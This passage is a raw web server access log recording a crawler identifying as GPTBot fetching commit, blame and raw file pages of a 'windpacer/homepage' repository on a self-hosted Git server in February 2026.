+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 74.7.227.38] [Length 10305] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" +[17/Feb/2026:13:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" +[17/Feb/2026:13:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 74.7.227.38] [Length 10763] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" [Client 74.7.227.38] [Length 11058] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" +[17/Feb/2026:13:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" +[17/Feb/2026:13:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 10825] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" +[17/Feb/2026:13:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" +[17/Feb/2026:13:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" [Client 74.7.227.38] [Length 11028] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" +[17/Feb/2026:13:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 11450] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:13:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 74.7.227.38] [Length 10171] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" +[17/Feb/2026:13:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 14696] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" [Client 74.7.227.38] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" +[17/Feb/2026:13:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" [Client 74.7.227.38] [Length 10260] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" +[17/Feb/2026:13:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" [Client 74.7.227.38] [Length 10260] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 9847] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" +[17/Feb/2026:13:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 74.7.227.38] [Length 10167] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" +[17/Feb/2026:13:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 18414] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 74.7.227.38] [Length 10015] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" +[17/Feb/2026:13:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 74.7.227.38] [Length 10636] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 10749] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" +[17/Feb/2026:13:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 74.7.227.38] [Length 9919] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 74.7.227.38] [Length 10566] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 11483] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 11891] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:13:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 10641] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" +[17/Feb/2026:13:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" +[17/Feb/2026:13:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 74.7.227.38] [Length 9967] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 11611] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" +[17/Feb/2026:13:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" +[17/Feb/2026:13:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" +[17/Feb/2026:13:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" +[17/Feb/2026:13:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" +[17/Feb/2026:13:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 10729] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" +[17/Feb/2026:13:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" +[17/Feb/2026:13:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" +[17/Feb/2026:13:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" +[17/Feb/2026:13:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" +[17/Feb/2026:13:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 11208] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" +[17/Feb/2026:13:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 10827] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" +[17/Feb/2026:13:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" +[17/Feb/2026:13:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" +[17/Feb/2026:13:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 74.7.227.38] [Length 10695] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" +[17/Feb/2026:13:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 14128] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10739] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" +[17/Feb/2026:13:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10710] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" +[17/Feb/2026:13:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 74.7.227.38] [Length 9933] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" +[17/Feb/2026:13:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 14904] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" +[17/Feb/2026:13:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 74.7.227.38] [Length 10895] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" +[17/Feb/2026:13:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 74.7.227.38] [Length 10717] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" +[17/Feb/2026:13:02:38 +0000] - 200 200 - GET https 